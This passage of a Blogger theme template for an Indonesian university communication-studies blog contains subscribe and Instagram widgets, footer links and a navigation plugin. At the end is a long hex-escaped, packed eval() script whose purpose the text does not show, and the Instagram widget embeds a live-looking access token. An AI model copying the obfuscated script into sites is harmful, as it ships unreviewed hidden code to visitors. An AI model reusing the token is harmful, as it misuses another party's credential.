3969 <b:widget-setting name='content'><div id='subscribe-css'>
3970<p class='subscribe-note'><i class="fa fa-gift" aria-hidden="true"></i> <span>Ayo Berlangganan</span> <span class='itatu'>&</span> Dapatkan info seru dari kita dan pastikan bergabung dengan Ilmu Komunikasi UNSIKA ya!</p>
3971<div class='subscribe-wrapper'>
3972<div class='subscribe-form'>
3973<form action='http://feedburner.google.com/fb/a/mailverify?uri=soratemplates' class='subscribe-form' method='post' onsubmit='window.open (&apos;http://feedburner.google.com/fb/a/mailverify?uri=soratemplates&apos;, &apos;popupwindow&apos;, &apos;scrollbars=yes,width=550,height=520&apos;);return true' target='popupwindow'>
3974<input name='uri' type='hidden' value='soratemplates'/><input name='loc' type='hidden' value='en_US'/><input autocomplete='off' class='subscribe-css-email-field' name='email' placeholder='Tulis Email-mu Disini'/><input class='subscribe-css-email-button' title='' type='Submit' value='Berlangganan!'/></form>
3975</div>
3976</div>
3977</div></b:widget-setting>
3978 </b:widget-settings>
3979 <b:includable id='main'>
3980 <!-- only display title if it's non-empty -->
3981 <b:if cond='data:title != ""'>
3982 <h2 class='title'><data:title/></h2>
3983 </b:if>
3984 <div class='widget-content'>
3985 <data:content/>
3986 </div>
3987
3988 <!--b:include name='quickedit'/-->
3989</b:includable>
3990 </b:widget>
3991 </b:section>
3992
3993 </div>
3994<div style='clear: both;'/>
3995<div class='insta-wrap'>
3996 <b:section class='featureinsta' id='Instagram Widget' maxwidget='1' showaddelement='yes'>
3997 <b:widget id='HTML208' locked='false' title='' type='HTML' version='1'>
3998 <b:widget-settings>
3999 <b:widget-setting name='content'><div id='instafeed'/>
4000<script type='text/javascript'>//<![CDATA[
4001var feed = new Instafeed({
4002 get: 'user',
4003 userId: 6727703157,
4004 limit:7,
4005 sortBy:'random',
4006accessToken: '6727703157.1677ed0.1253283414084befbd2cf844ce05bbfa',
4007template: '<li><a href="{{link}}" target="_blank"><img src="{{image}}" /><div class="insta-likes"><div style="display: table; vertical-align: middle; height: 100%; width: 100%;"><span style="display: table-cell; vertical-align: middle; height: 100%; width: 100%;">{{likes}} <i class="fa fa-heart"></i><br/>{{comments}} <i class="fa fa-comment"></i></span></div></div></a></li>',
4008 resolution: 'standard_resolution'
4009 });
4010 feed.run();
4011//]]>
4012</script></div></b:widget-setting>
4013 </b:widget-settings>
4014 <b:includable id='main'>
4015 <!-- only display title if it's non-empty -->
4016 <b:if cond='data:title != ""'>
4017 <h2 class='title'><data:title/></h2>
4018 </b:if>
4019 <div class='widget-content'>
4020 <data:content/>
4021 </div>
4022
4023 <!--b:include name='quickedit'/-->
4024</b:includable>
4025 </b:widget>
4026 </b:section>
4027</div>
4028<div style='clear: both;'/>
4029 </b:if>
4030<div id='jugas_footer'>
4031 <div class='copy-container row'>
4032 <div class='foot-social'>
4033<b:section class='foot-bar-social blue' id='Footer social widget' maxwidgets='1' name='Footer Social Widget'>
4034 <b:widget id='LinkList250' locked='false' title='Social Media Icons' type='LinkList' version='1'>
4035 <b:widget-settings>
4036 <b:widget-setting name='sorting'>NONE</b:widget-setting>
4037 <b:widget-setting name='text-1'>twitter</b:widget-setting>
4038 <b:widget-setting name='link-1'>#</b:widget-setting>
4039 <b:widget-setting name='text-0'>facebook</b:widget-setting>
4040 <b:widget-setting name='link-2'>#</b:widget-setting>
4041 <b:widget-setting name='link-0'>#</b:widget-setting>
4042 <b:widget-setting name='text-2'>gplus</b:widget-setting>
4043 </b:widget-settings>
4044 <b:includable id='main'>
4045 <div class='widget-content'>
4046 <ul id='social'>
4047 <b:loop values='data:links' var='link'>
4048 <li><a expr:class='data:link.name' expr:href='data:link.target' expr:title='data:link.name'/></li>
4049 </b:loop>
4050 </ul>
4051 </div>
4052 </b:includable>
4053 </b:widget>
4054</b:section>
4055</div>
4056 <div class='jugas_footer_copyright'>
4057 Designed with <i aria-hidden='true' class='fa fa-heart' style='color: red;'/> by <a href='http://www.way2themes.com/' id='mycontent' title='Free Blogger Templates'>Way2themes</a>
4058
4059
4060
4061 </div>
4062
4063
4064
4065 </div>
4066 </div>
4067</div>
4068<script type='text/javascript'>
4069//<![CDATA[
4070// Plugin: SelectNav.js ~ url: https://github.com/lukaszfiszer/selectnav.js
4071window.selectnav=function(){"use strict";var e=function(e,t){function c(e){var t;if(!e)e=window.event;if(e.target)t=e.target;else if(e.srcElement)t=e.srcElement;if(t.nodeType===3)t=t.parentNode;if(t.value)window.location.href=t.value}function h(e){var t=e.nodeName.toLowerCase();return t==="ul"||t==="ol"}function p(e){for(var t=1;document.getElementById("selectnav"+t);t++);return e?"selectnav"+t:"selectnav"+(t-1)}function d(e){a++;var t=e.children.length,n="",l="",c=a-1;if(!t){return}if(c){while(c--){l+=o}l+=" "}for(var v=0;v<t;v++){var m=e.children[v].children[0];if(typeof m!=="undefined"){var g=m.innerText||m.textContent;var y="";if(r){y=m.className.search(r)!==-1||m.parentNode.className.search(r)!==-1?f:""}if(i&&!y){y=m.href===document.URL?f:""}n+='<option value="'+m.href+'" '+y+">"+l+g+"</option>";if(s){var b=e.children[v].children[1];if(b&&h(b)){n+=d(b)}}}}if(a===1&&u){n='<option value="">'+u+"</option>"+n}if(a===1){n='<select class="selectnav" id="'+p(true)+'">'+n+"</select>"}a--;return n}e=document.getElementById(e);if(!e){return}if(!h(e)){return}if(!("insertAdjacentHTML"in window.document.documentElement)){return}document.documentElement.className+=" js";var n=t||{},r=n.activeclass||"active",i=typeof n.autoselect==="boolean"?n.autoselect:true,s=typeof n.nested==="boolean"?n.nested:true,o=n.indent||"-",u=n.label||"Menu",a=0,f=" selected ";e.insertAdjacentHTML("afterend",d(e));var l=document.getElementById(p());if(l.addEventListener){l.addEventListener("change",c)}if(l.attachEvent){l.attachEvent("onchange",c)}return l};return function(t,n){e(t,n)}}();
4072
4073
4074var _Rf8ZyH= "\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x6e\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x27\x5c\x5c\x62\x27\x2b\x65\x28\x63\x29\x2b\x27\x5c\x5c\x62\x27\x2c\x27\x67\x27\x29\x2c\x6b\x5b\x63\x5d\x29\x7d\x7d\x72\x65\x74\x75\x72\x6e\x20\x70\x7d\x28\x27\x31\x47\x20\x31\x33\x3d\x5b\x22\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x39\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x44\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x4e\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x70\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x31\x34\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x6a\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x57\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x6a\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x56\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x76\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x6e\x5c\x5c\x64\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x5a\x5c\x5c\x69\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x5a\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x71\x5c\x5c\x69\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x6a\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x6c\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x53\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x32\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x4c\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x70\x5c\x5c\x51\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x41\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x4f\x5c\x5c\x31\x68\x5c\x5c\x31\x68\x5c\x5c\x64\x5c\x5c\x4c\x5c\x5c\x69\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x31\x73\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x6c\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x4c\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x31\x62\x5c\x5c\x69\x5c\x5c\x4c\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x65\x5c\x5c\x4c\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x75\x5c\x5c\x31\x69\x5c\x5c\x64\x5c\x5c\x54\x5c\x5c\x69\x5c\x5c\x51\x5c\x5c\x70\x5c\x5c\x54\x5c\x5c\x78\x5c\x5c\x4e\x5c\x5c\x31\x68\x5c\x5c\x31\x68\x5c\x5c\x64\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x57\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x57\x5c\x5c\x68\x5c\x5c\x63\x5c\x5c\x57\x5c\x5c\x69\x5c\x5c\x6a\x5c\x5c\x63\x5c\x5c\x31\x61\x5c\x5c\x77\x5c\x5c\x31\x34\x5c\x5c\x6a\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x54\x5c\x5c\x41\x5c\x5c\x4e\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x63\x5c\x5c\x48\x5c\x5c\x69\x5c\x5c\x4e\x5c\x5c\x77\x5c\x5c\x54\x5c\x5c\x75\x5c\x5c\x6e\x5c\x5c\x64\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x51\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x41\x5c\x5c\x63\x5c\x5c\x48\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x65\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x57\x5c\x5c\x78\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x57\x5c\x5c\x78\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x47\x5c\x5c\x5a\x5c\x5c\x69\x5c\x5c\x5a\x5c\x5c\x62\x5c\x5c\x31\x63\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x63\x5c\x5c\x6c\x5c\x5c\x73\x5c\x5c\x63\x5c\x5c\x31\x76\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x41\x5c\x5c\x6c\x5c\x5c\x68\x5c\x5c\x31\x32\x5c\x5c\x69\x5c\x5c\x6a\x5c\x5c\x61\x5c\x5c\x76\x5c\x5c\x71\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x76\x5c\x5c\x5a\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x6c\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x41\x5c\x5c\x6c\x5c\x5c\x68\x5c\x5c\x31\x32\x5c\x5c\x69\x5c\x5c\x6a\x5c\x5c\x61\x5c\x5c\x76\x5c\x5c\x71\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x75\x5c\x5c\x6e\x5c\x5c\x64\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x51\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x41\x5c\x5c\x54\x5c\x5c\x75\x5c\x5c\x51\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x65\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x61\x5c\x5c\x75\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x5a\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x6c\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x4e\x5c\x5c\x69\x5c\x5c\x54\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x6e\x5c\x5c\x64\x5c\x5c\x4d\x5c\x5c\x68\x5c\x5c\x4c\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x75\x5c\x5c\x4e\x5c\x5c\x78\x5c\x5c\x69\x5c\x5c\x4c\x5c\x5c\x75\x5c\x5c\x4c\x5c\x5c\x76\x5c\x5c\x76\x5c\x5c\x65\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x57\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x57\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x4f\x5c\x5c\x31\x62\x5c\x5c\x69\x5c\x5c\x4c\x5c\x5c\x31\x68\x5c\x5c\x31\x68\x5c\x5c\x64\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x79\x5c\x5c\x76\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x56\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x31\x34\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x32\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x77\x5c\x5c\x64\x5c\x5c\x79\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x31\x34\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x32\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x57\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x53\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x57\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x5a\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x63\x5c\x5c\x5a\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x31\x34\x5c\x5c\x68\x5c\x5c\x57\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x57\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x38\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x56\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x6e\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x31\x6d\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x70\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x31\x34\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x77\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x53\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x66\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x31\x34\x5c\x5c\x50\x5c\x5c\x63\x5c\x5c\x63\x5c\x5c\x31\x62\x5c\x5c\x31\x31\x5c\x5c\x75\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x63\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x55\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x39\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x42\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x4a\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x55\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x4b\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x6b\x5c\x5c\x57\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x31\x6c\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x31\x42\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x31\x6c\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x31\x42\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x42\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x4a\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x55\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x4b\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x42\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x31\x6c\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x62\x5c\x5c\x6d\x5c\x5c\x77\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x77\x5c\x5c\x31\x42\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x31\x6c\x5c\x5c\x6a\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x39\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x58\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x51\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x66\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x76\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x6a\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x63\x5c\x5c\x77\x5c\x5c\x63\x5c\x5c\x54\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x31\x75\x5c\x5c\x68\x5c\x5c\x6c\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x4c\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x66\x5c\x5c\x77\x5c\x5c\x31\x75\x5c\x5c\x68\x5c\x5c\x6c\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x53\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x66\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x66\x5c\x5c\x70\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x63\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x31\x63\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x73\x5c\x5c\x31\x78\x5c\x5c\x62\x5c\x5c\x31\x71\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x73\x5c\x5c\x63\x5c\x5c\x56\x5c\x5c\x62\x5c\x5c\x31\x71\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x53\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x31\x66\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x66\x5c\x5c\x70\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x63\x5c\x5c\x55\x5c\x5c\x68\x5c\x5c\x67\x5c\x5c\x62\x5c\x5c\x31\x63\x5c\x5c\x64\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x4e\x5c\x5c\x77\x5c\x5c\x7a\x5c\x5c\x61\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x63\x5c\x5c\x53\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x47\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x31\x39\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x6b\x5c\x5c\x68\x5c\x5c\x63\x5c\x5c\x46\x5c\x5c\x64\x5c\x5c\x4b\x5c\x5c\x70\x5c\x5c\x66\x5c\x5c\x70\x5c\x5c\x74\x5c\x5c\x65\x5c\x5c\x49\x5c\x5c\x44\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x63\x5c\x5c\x64\x5c\x5c\x49\x5c\x5c\x71\x5c\x5c\x50\x5c\x5c\x61\x5c\x5c\x73\x5c\x5c\x63\x5c\x5c\x31\x66\x5c\x5c\x73\x5c\x5c\x63\x5c\x5c\x45\x5c\x5c\x73\x5c\x5c\x31\x78\x5c